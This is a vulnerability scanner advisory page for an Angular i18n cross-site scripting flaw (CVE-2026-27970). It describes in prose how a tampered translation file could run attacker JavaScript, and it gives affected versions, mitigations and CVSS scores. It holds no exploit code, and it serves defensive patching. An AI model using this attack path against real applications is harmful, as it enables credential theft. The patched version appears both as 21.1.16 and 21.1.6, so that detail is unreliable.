SCA: security update for @angular/core (GHSA-prjf-86w9-mfqv)

high Tenable Cloud Security Plugin ID 438037

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- Angular is a development platform for building mobile and desktop web applications using
TypeScript/JavaScript and other languages. Versions prior to 21.2.0, 21.1.16, 20.3.17, and 19.2.19 have a
cross-Site scripting vulnerability in the Angular internationalization (i18n) pipeline. In ICU messages
(International Components for Unicode), HTML from translated content was not properly sanitized and could
execute arbitrary JavaScript. Angular i18n typically involves three steps, extracting all messages from an
application in the source language, sending the messages to be translated, and then merging their
translations back into the final source code. Translations are frequently handled by contracts with
specific partner companies, and involve sending the source messages to a separate contractor before
receiving final translations for display to the end user. If the returned translations have malicious
content, it could be rendered into the application and execute arbitrary JavaScript. When successfully
exploited, this vulnerability allows for execution of attacker controlled JavaScript in the application
origin. Depending on the nature of the application being exploited this could lead to credential
exfiltration and/or page vandalism. Several preconditions apply to the attack. The attacker must
compromise the translation file (xliff, xtb, etc.). Unlike most XSS vulnerabilities, this issue is not
exploitable by arbitrary users. An attacker must first compromise an application's translation file before
they can escalate privileges into the Angular application client. The victim application must use Angular
i18n, use one or more ICU messages, render an ICU message, and not defend against XSS via a safe content
security policy. Versions 21.2.0, 21.1.6, 20.3.17, and 19.2.19 patch the issue. Until the patch is
applied, developers should consider reviewing and verifying translated content received from untrusted
third parties before incorporating it in an Angular application, enabling strict CSP controls to block
unauthorized JavaScript from executing on the page, and enabling Trusted Types to enforce proper HTML
sanitization. (CVE-2026-27970)

See Also

https://github.com/advisories/GHSA-prjf-86w9-mfqv

Plugin Details

Severity: High

ID: 438037

Version: Revision 1.3

Type: Local

Family: SCA Checks

Published: 3/2/2026

Updated: 3/16/2026

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Low

Score: 2.3

Percentile: 9.42

Vendor

Vendor Severity: High

CVSS v2

Risk Factor: Medium

Base Score: 6.4

Temporal Score: 4.7

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS Score Source: CVE-2026-27970

CVSS v3

Risk Factor: Medium

Base Score: 6.1

Temporal Score: 5.3

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

CVSS v4

Risk Factor: High

Base Score: 7.6

Threat Score: 4.9

Threat Vector: CVSS:4.0/E:U

Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Vulnerability Information

Exploit Ease: No known exploits are available

Patch Publication Date: 2/27/2026

Vulnerability Publication Date: 2/26/2026

Reference Information

CVE: CVE-2026-27970

cwe: CWE-79